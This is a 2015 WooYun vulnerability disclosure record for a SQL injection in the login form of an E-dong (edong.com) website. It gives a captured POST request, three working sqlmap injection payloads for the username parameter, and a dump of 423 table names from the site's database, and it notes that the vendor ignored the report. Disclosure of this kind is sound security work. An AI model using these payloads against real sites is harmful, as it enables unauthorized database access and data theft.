当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0133186

漏洞标题:E动网某站存在SQL注入

相关厂商:中国E动网

漏洞作者: 路人甲

提交时间:2015-08-11 10:36

修复时间:2015-08-16 10:38

公开时间:2015-08-16 10:38

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-11: 细节已通知厂商并且等待厂商处理中
2015-08-16: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

http://wz.edong.com/

POST /index.php?a=checklogin&m=Users HTTP/1.1
Content-Length: 429
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=b65695a513516c3f7383b2e949f2ae17; __tsa___sid=121757005.1439207058369743571; __tsa__safe_nd=121757005.1439207092141
Host: wz.edong.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
password=g00dPa%24%24w0rD&username=1111&__hash__=bf1ede35e1b284d4092f5216df92a632_558433125d9b628bb2e8eb392d59d7b1

username参数

2.png

漏洞证明:

423张表:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: username
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: password=g00dPa$$w0rD&username=1111') RLIKE (SELECT (CASE WHEN (1138=1138) THEN 1111 ELSE 0x28 END)) AND ('FUzF'='FUzF&__hash__=bf1ede35e1b284d4092f5216df92a632_558433125d9b628bb2e8eb392d59d7b1
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: password=g00dPa$$w0rD&username=1111') AND (SELECT 8850 FROM(SELECT COUNT(*),CONCAT(0x716b6d6471,(SELECT (CASE WHEN (8850=8850) THEN 1 ELSE 0 END)),0x7163676971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('PUJn'='PUJn&__hash__=bf1ede35e1b284d4092f5216df92a632_558433125d9b628bb2e8eb392d59d7b1
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: password=g00dPa$$w0rD&username=1111') AND 6883=BENCHMARK(5000000,MD5(0x67454b6c)) AND ('pppf'='pppf&__hash__=bf1ede35e1b284d4092f5216df92a632_558433125d9b628bb2e8eb392d59d7b1
---
web application technology: Apache
back-end DBMS: MySQL 5.0
Database: wzedong007
[423 tables]
+-------------------------------------+
| wqy_access |
| wqy_adma |
| wqy_agent |
| wqy_agent_expenserecords |
| wqy_agent_function |
| wqy_agent_price |
| wqy_alipay_config |
| wqy_api |
| wqy_areply |
| wqy_article |
| wqy_attribute |
| wqy_baoming |
| wqy_baoming_list |
| wqy_baoming_order |
| wqy_behavior |
| wqy_busines |
| wqy_busines_comment |
| wqy_busines_main |
| wqy_busines_pic |
| wqy_busines_second |
| wqy_car |
| wqy_car_utility |
| wqy_carmodel |
| wqy_carnews |
| wqy_carowner |
| wqy_carsaler |
| wqy_carseries |
| wqy_carset |
| wqy_caruser |
| wqy_case |
| wqy_catemenu |
| wqy_classify |
| wqy_company |
| wqy_company_staff |
| wqy_cosmetology |
| wqy_cosmetology_departments |
| wqy_cosmetology_setup |
| wqy_cosmetology_setup_control |
| wqy_custom_field |
| wqy_custom_info |
| wqy_custom_limit |
| wqy_custom_set |
| wqy_czzreply_info |
| wqy_dati |
| wqy_dati_record |
| wqy_deliemail |
| wqy_delisms |
| wqy_diaoyan |
| wqy_diaoyan_timu |
| wqy_diaoyan_user |
| wqy_dining_table |
| wqy_dish |
| wqy_dish_company |
| wqy_dish_like |
| wqy_dish_order |
| wqy_dish_sort |
| wqy_dish_table |
| wqy_diyform |
| wqy_diyform_set |
| wqy_diymen_class |
| wqy_diymen_set |
| wqy_dream |
| wqy_estate |
| wqy_estate_album |
| wqy_estate_expert |
| wqy_estate_housetype |
| wqy_estate_impress |
| wqy_estate_impress_add |
| wqy_estate_son |
| wqy_fangchan |
| wqy_fangchan_reply |
| wqy_fenlei |
| wqy_fenlei_flash |
| wqy_fenlei_reply |
| wqy_fenlei_setcin |
| wqy_files |
| wqy_flash |
| wqy_forum_comment |
| wqy_forum_config |
| wqy_forum_message |
| wqy_forum_topics |
| wqy_function |
| wqy_gamereply_info |
| wqy_gametreply_info |
| wqy_gamettreply_info |
| wqy_goldegg |
| wqy_goldegg_record |
| wqy_greeting_card |
| wqy_heka |
| wqy_heka_list |
| wqy_home |
| wqy_home_background |
| wqy_host |
| wqy_host_list_add |
| wqy_host_order |
| wqy_hotels_house |
| wqy_hotels_house_sort |
| wqy_hotels_order |
| wqy_huadian |
| wqy_huadiancom |
| wqy_huadianphoto |
| wqy_huadianposter |
| wqy_huadiansub |
| wqy_huadianunits |
| wqy_huisuo_photo |
| wqy_hunqing |
| wqy_hunqingcom |
| wqy_hunqingphoto |
| wqy_hunqingposter |
| wqy_hunqingsub |
| wqy_hunqingunits |
| wqy_img |
| wqy_img_multi |
| wqy_indent |
| wqy_invites |
| wqy_invites_info |
| wqy_jianshen |
| wqy_jianshencom |
| wqy_jianshenphoto |
| wqy_jianshenposter |
| wqy_jianshensub |
| wqy_jianshenunits |
| wqy_jiaoyu |
| wqy_jiaoyucom |
| wqy_jiaoyuphoto |
| wqy_jiaoyuposter |
| wqy_jiaoyusub |
| wqy_jiaoyuunits |
| wqy_jiejing |
| wqy_jikedati |
| wqy_jikedati_flash |
| wqy_jikedati_reply |
| wqy_jikedati_setcin |
| wqy_jikedati_user |
| wqy_jiuba |
| wqy_jiubacom |
| wqy_jiubaphoto |
| wqy_jiubaposter |
| wqy_jiubasub |
| wqy_jiubaunits |
| wqy_kefu |
| wqy_keyword |
| wqy_ktv |
| wqy_ktv_photo |
| wqy_ktvcom |
| wqy_ktvphoto |
| wqy_ktvposter |
| wqy_ktvsub |
| wqy_ktvunits |
| wqy_leave |
| wqy_links |
| wqy_lottery |
| wqy_lottery_cheat |
| wqy_lottery_record |
| wqy_lvyou |
| wqy_lvyoucom |
| wqy_lvyouphoto |
| wqy_lvyouposter |
| wqy_lvyousub |
| wqy_lvyouunits |
| wqy_mail |
| wqy_market |
| wqy_market_area |
| wqy_market_cate |
| wqy_market_nav |
| wqy_market_park |
| wqy_market_slide |
| wqy_medical |
| wqy_medical_departments |
| wqy_medical_set |
| wqy_medical_setup |
| wqy_medical_setup_control |
| wqy_medical_user |
| wqy_meirong |
| wqy_meirong_album |
| wqy_meirong_expert |
| wqy_meirong_housetype |
| wqy_meirong_impress |
| wqy_meirong_impress_add |
| wqy_meirong_son |
| wqy_member |
| wqy_member_business |
| wqy_member_business_ad |
| wqy_member_business_case |
| wqy_member_business_fav |
| wqy_member_business_product |
| wqy_member_card_contact |
| wqy_member_card_coupon |
| wqy_member_card_create |
| wqy_member_card_custom |
| wqy_member_card_exchange |
| wqy_member_card_focus |
| wqy_member_card_info |
| wqy_member_card_integral |
| wqy_member_card_myintegral |
| wqy_member_card_notice |
| wqy_member_card_pay_record |
| wqy_member_card_set |
| wqy_member_card_sign |
| wqy_member_card_use_record |
| wqy_member_card_vip |
| wqy_member_wei_category |
| wqy_memberflash |
| wqy_moopha_article |
| wqy_moopha_attachement |
| wqy_moopha_channel |
| wqy_moopha_channel_contentattribute |
| wqy_moopha_keywords |
| wqy_moopha_picture |
| wqy_moopha_site |
| wqy_moopha_template |
| wqy_moopha_user |
| wqy_msg |
| wqy_nearby_user |
| wqy_node |
| wqy_norms |
| wqy_ordering_class |
| wqy_ordering_set |
| wqy_other |
| wqy_panorama |
| wqy_payment |
| wqy_photo |
| wqy_photo_list |
| wqy_pic_wall |
| wqy_pic_walllog |
| wqy_product |
| wqy_product_attribute |
| wqy_product_cart |
| wqy_product_cart_list |
| wqy_product_cat |
| wqy_product_comment |
| wqy_product_diningtable |
| wqy_product_image |
| wqy_product_mail_price |
| wqy_product_setting |
| wqy_quanxian |
| wqy_recipe |
| wqy_recognition |
| wqy_reply |
| wqy_reply_info |
| wqy_requestdata |
| wqy_research |
| wqy_research_answer |
| wqy_research_question |
| wqy_research_result |
| wqy_reservation |
| wqy_reservebook |
| wqy_rippleos_node |
| wqy_role |
| wqy_role_user |
| wqy_router |
| wqy_router_config |
| wqy_school_classify |
| wqy_school_score |
| wqy_school_set_index |
| wqy_school_students |
| wqy_school_tcourse |
| wqy_school_teachers |
| wqy_selfform |
| wqy_selfform_input |
| wqy_selfform_value |
| wqy_send_message |
| wqy_seo |
| wqy_service_logs |
| wqy_service_user |
| wqy_setinfo |
| wqy_shake |
| wqy_shakelog |
| wqy_share |
| wqy_share_set |
| wqy_shipin |
| wqy_shipincom |
| wqy_shipinphoto |
| wqy_shipinposter |
| wqy_shipinsub |
| wqy_shipinunits |
| wqy_sign_conf |
| wqy_sign_in |
| wqy_sign_set |
| wqy_site_plugmenu |
| wqy_sjmreply_info |
| wqy_sms_expendrecord |
| wqy_sms_record |
| wqy_snccode |
| wqy_sncode |
| wqy_storeflash |
| wqy_styleset |
| wqy_system_info |
| wqy_taobao |
| wqy_text |
| wqy_token_open |
| wqy_toshake |
| wqy_update_record |
| wqy_upyun_attachement |
| wqy_user |
| wqy_user_group |
| wqy_user_request |
| wqy_userinfo |
| wqy_users |
| wqy_vcard |
| wqy_vcard_list |
| wqy_voiceresponse |
| wqy_vote |
| wqy_vote_item |
| wqy_vote_record |
| wqy_wall |
| wqy_wall_member |
| wqy_wall_message |
| wqy_wall_prize_record |
| wqy_weather |
| wqy_wecha_user |
| wqy_wechat_group |
| wqy_wechat_group_list |
| wqy_wecht_grout |
| wqy_wedding |
| wqy_wedding_info |
| wqy_wehcat_member_enddate |
| wqy_weilivereply_info |
| wqy_weixin_ad |
| wqy_weixin_adboard |
| wqy_weixin_address |
| wqy_weixin_admin |
| wqy_weixin_admin_auth |
| wqy_weixin_admin_role |
| wqy_weixin_album |
| wqy_weixin_album_cate |
| wqy_weixin_album_comment |
| wqy_weixin_album_follow |
| wqy_weixin_album_item |
| wqy_weixin_alipay |
| wqy_weixin_article |
| wqy_weixin_article_cate |
| wqy_weixin_article_page |
| wqy_weixin_auto_user |
| wqy_weixin_badword |
| wqy_weixin_brandlist |
| wqy_weixin_custom_menu |
| wqy_weixin_delivery |
| wqy_weixin_flink |
| wqy_weixin_flink_cate |
| wqy_weixin_images |
| wqy_weixin_ipban |
| wqy_weixin_item |
| wqy_weixin_item_attr |
| wqy_weixin_item_cate |
| wqy_weixin_item_cate_tag |
| wqy_weixin_item_comment |
| wqy_weixin_item_img |
| wqy_weixin_item_like |
| wqy_weixin_item_order |
| wqy_weixin_item_orig |
| wqy_weixin_item_site |
| wqy_weixin_item_tag |
| wqy_weixin_keyword |
| wqy_weixin_mail_queue |
| wqy_weixin_menu |
| wqy_weixin_message |
| wqy_weixin_message_tpl |
| wqy_weixin_nav |
| wqy_weixin_oauth |
| wqy_weixin_order_detail |
| wqy_weixin_score_item |
| wqy_weixin_score_item_cate |
| wqy_weixin_score_log |
| wqy_weixin_score_order |
| wqy_weixin_setting |
| wqy_weixin_tag |
| wqy_weixin_topic |
| wqy_weixin_topic_at |
| wqy_weixin_topic_comment |
| wqy_weixin_topic_index |
| wqy_weixin_topic_relation |
| wqy_weixin_user |
| wqy_weixin_user_address |
| wqy_weixin_user_bind |
| wqy_weixin_user_follow |
| wqy_weixin_user_msgtip |
| wqy_weixin_user_stat |
| wqy_wifi |
| wqy_wuye |
| wqy_wuyecom |
| wqy_wuyephoto |
| wqy_wuyeposter |
| wqy_wuyesub |
| wqy_wuyeunits |
| wqy_wxuser |
| wqy_wxwall_award |
| wqy_wxwall_members |
| wqy_wxwall_message |
| wqy_yingyong |
| wqy_yingyong_reply |
| wqy_yml_config |
| wqy_yml_record |
| wqy_yuezhanreply_info |
| wqy_yuyue |
| wqy_yuyue_order |
| wqy_yuyue_setcin |
| wqy_yzdd |
| wqy_yzdd_record |
| wqy_yzdd_record_data |
| wqy_yzddtk |
| wqy_zhaopin |
| wqy_zhaopin_jianli |
| wqy_zhaopin_reply |
| wqy_zhengwu |
| wqy_zhengwucom |
| wqy_zhengwuphoto |
| wqy_zhengwuposter |
| wqy_zhengwusub |
| wqy_zhengwuunits |
| wqy_zhida |
| wqy_zhuangxiu |
| wqy_zhuangxiu_album |
| wqy_zhuangxiu_expert |
| wqy_zhuangxiu_housetype |
| wqy_zhuangxiu_impress |
| wqy_zhuangxiu_impress_add |
| wqy_zhuangxiu_son |
| wqy_zhuangxiucom |
| wqy_zhuangxiuphoto |
| wqy_zhuangxiuposter |
| wqy_zhuangxiusub |
| wqy_zhuangxiuunits |
+-------------------------------------+

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-08-16 10:38

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无


漏洞评价:

评论